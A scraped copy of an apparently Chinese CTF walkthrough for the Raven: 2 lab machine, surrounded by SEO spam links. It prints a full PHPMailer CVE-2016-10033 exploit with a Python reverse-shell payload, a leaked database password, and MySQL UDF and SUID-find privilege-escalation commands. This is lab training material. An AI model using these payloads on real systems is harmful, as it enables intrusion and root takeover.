当前位置: 首页 > news >正文

自己建企业网站怎么建谷歌搜索引擎香港免费入口

news 2025/8/14 18:57:09
自己建企业网站怎么建,谷歌搜索引擎香港免费入口,wordpress历史版本,中山地区做网站公司文章目录 信息收集主机发现端口扫描目录扫描用户枚举 漏洞发现漏洞利用UDF脚本MySQL提权SUID提权 靶机文档:Raven: 2 下载地址:Download (Mirror) 信息收集 靶机MAC地址:00:0C:29:15:7F:17 主机发现 sudo nmap -sn 192.168.8.0/24sudo arp…

文章目录

      • 信息收集
        • 主机发现
        • 端口扫描
        • 目录扫描
        • 用户枚举
      • 漏洞发现
      • 漏洞利用
        • UDF脚本
        • MySQL提权
        • SUID提权

靶机文档:Raven: 2

下载地址:Download (Mirror)

信息收集

靶机MAC地址:00:0C:29:15:7F:17

主机发现
sudo nmap -sn 192.168.8.0/24

image-20231013154828867

sudo arp-scan -l

image-20231013154848393

端口扫描
sudo nmap --min-rate 10000 -p- 192.168.8.21# --min-rate 最小速度 # -p- 全端口扫描  1-65535

image-20231013155029073

 sudo nmap -sU  --min-rate 10000 -p- 192.168.8.21

image-20231013155235221

sudo nmap -sT -sV -O -p 22,80,111,42333,38970  192.168.8.21# -sT TCP扫描
# -sV 扫描版本信息
# -O 枚举操作系统信息

image-20231013160528666

sudo nmap --script=vuln  -p 22,80,111,42333,38970  192.168.8.21# 漏洞扫描

image-20231013161100493

发现有wordpress目录,说明是wordpress的一个cms

访问vendor

image-20231013171512651

image-20231013171640636

上网查得知这是php发送邮件类,phpMailer,版本5.2.16

目录扫描
dirsearch -u 192.168.8.21

image-20231013165247328

用户枚举

枚举 WordPress 站点中注册过的用户名,来制作用户名字典。

wpscan --url http://192.168.8.21/wordpress/ -e u

image-20231013165205634

枚举出两个用户steven michael

cewl密码字典制作

cewl http://192.168.8.21/wordpress/ -w password.txt

image-20231013165528723

wpscan  --url http://192.168.8.21/wordpress/ -U user.txt -P password.txt # 调用相关的字典文件对网站进行爆破。

wpscan爆破失败

尝试九头蛇爆破SSH,也失败了

漏洞发现

  • https://www.exploit-db.com/exploits/40974
searchsploit phpmailer

image-20231013172023442

可以看出该网站 phpmailer 5.2.16存在远程代码执行漏洞

漏洞利用

找出绝对 路径

searchsploit -m 40974.py

image-20231013172711255

修改exp脚本

image-20231013174636103

#!/usr/bin/python
# -*- coding: utf-8 -*-"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033Description:
Exploiting PHPMail with back connection (reverse shell) from the targetUsage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.pyVideo PoC: https://www.youtube.com/watch?v=DXeZxKr-qsUFull Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lhos.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")target = 'http://192.168.8.21/contact.php'
backdoor = '/shell.php'payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.8.8\\\',6868));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit','name': payload,'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com','message': 'Pwned'}m = MultipartEncoder(fields=fields,boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')headers={'User-Agent': 'curl/7.47.0','Content-Type': m.content_type}proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:print('[+]  ExPLoITeD ' + target)

执行exp

python 40974.py

image-20231013174424595

kali监听6868端口

nc -lvp 6868

浏览器访问生成的后门文件,拿到shell

image-20231013174937057

使用python拿到交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查看wordpress的配置文件 /var/www/html/wordpress/wp-config.php

发现数据库用户root,密码R@v3nSecurity

先看一下数据库的版本select version();

得出版本为:5.5.60-0+deb8u1

UDF脚本

利用脚本

  • https://www.exploit-db.com/exploits/1518

image-20231013191717106

searchsploit -m 1518
cp /usr/share/exploitdb/exploits/linux/local/1518.c ./1518.c
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc

将1518.so 文件上传到/tmp 目录下

image-20231013193749089

MySQL提权
create database saury;
use saury;
create table saury(line blob);
insert into saury values(load_file('/tmp/1518.so'));
select * from saury into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select do_system('chmod u+s /usr/bin/find');

image-20231013194252035

此时,/usr/bin/find 就具备了SUID 权限

SUID提权
find ./ -exec '/bin/sh' \;

image-20231013194647015

http://www.tj-hxxt.cn/news/111477.html

相关文章:

  • 做网站和维护要多少钱seo排名快速上升
  • 网站不让百度收录企业网页设计报价
  • asp加dw做网站优化大师有用吗
  • 安徽鲲鹏建设集团有限公司网站推广普通话手抄报模板
  • 小程序定制一般多少钱湖南长沙seo
  • 美国公司查询网站seo搜索引擎优化报价
  • 做本地团购网站发布新闻最快的网站
  • 品牌网站开发特点网络优化工程师前景如何
  • 自助建设手机网站推广信息怎么写
  • 求有题目做的学习网站企业培训机构排名前十
  • 外贸球衣网站阿里云域名注册入口官网
  • 网站快速备案被退回的几种原因分析app下载推广
  • 电商网购网站怎么做国内优秀网页设计赏析
  • vb net 做网站查询网 网站查询
  • 做网站怎么申请百度推广杭州seo全网营销
  • 盐城网站建设ycbeasy口碑营销的定义
  • 什么网站可以做项目seo视频网页入口网站推广
  • 怎么做自己的淘宝客网站免费私人网站建设平台
  • 徐州哪家公司做网站水平好重庆seo网页优化
  • 建筑企业网站设计拼多多跨境电商平台
  • 做外贸网站基本流程电商运营基础知识
  • 罗湖专业做网站公司抖音seo培训
  • 个人电子邮箱怎么填写格式西安seo培训学校
  • 网站页面设计 8种常见的网站版面布局形式四川网络推广seo
  • 做网站需要招什么条件seo关键词优化策略
  • 网站备案 英文企业邮箱登录
  • 北京怎么样做网站58同城推广
  • 重庆网站建设报价游戏推广员到底犯不犯法
  • 易语言如何做浏网站网络营销的五大优势
  • 菜鸟教程网站是怎么做的一天赚2000加微信